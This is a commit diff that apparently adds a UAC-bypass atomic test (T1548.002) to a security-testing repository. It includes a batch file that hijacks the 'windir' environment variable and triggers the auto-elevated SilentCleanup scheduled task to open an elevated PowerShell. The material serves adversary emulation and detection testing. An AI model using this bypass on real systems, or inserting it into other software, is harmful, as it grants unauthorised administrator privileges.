T1548.002-Update (#1492)

* T1548.002-Update * formatting Co-authored-by: Toua Lor <tlor@nti.local> Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2021-06-02 21:48:22 -05:00
parent e37f8c6178
commit 980c7e8bd5
2 changed files with 33 additions and 0 deletions
@@ -162,3 +162,28 @@ atomic_tests:
      reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
    name: command_prompt
    elevation_required: true
+- name: Bypass UAC using SilentCleanup task
+  description: |
+    Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/
+    
+    There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level).
+    
+    For example, we can set the windir registry kye to: "cmd /k REM "
+   
+    And forcefully run SilentCleanup task:
+    
+    schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
+    
+    REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs.
+  supported_platforms:
+  - windows
+  input_arguments:
+    file_path:
+      description: Path to the bat file
+      type: String
+      default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat
+  executor:
+    command: |
+      #{file_path}
+    name: command_prompt
+    elevation_required: false
@@ -0,0 +1,8 @@
+@echo off
+mode 18,1
+color FE
+reg add "HKCU\Environment" /v "windir" /d "cmd /c start powershell&REM " >nul
+timeout /t 2 >nul
+schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul
+timeout /t 3 >nul
+reg delete "HKCU\Environment" /v "windir" /F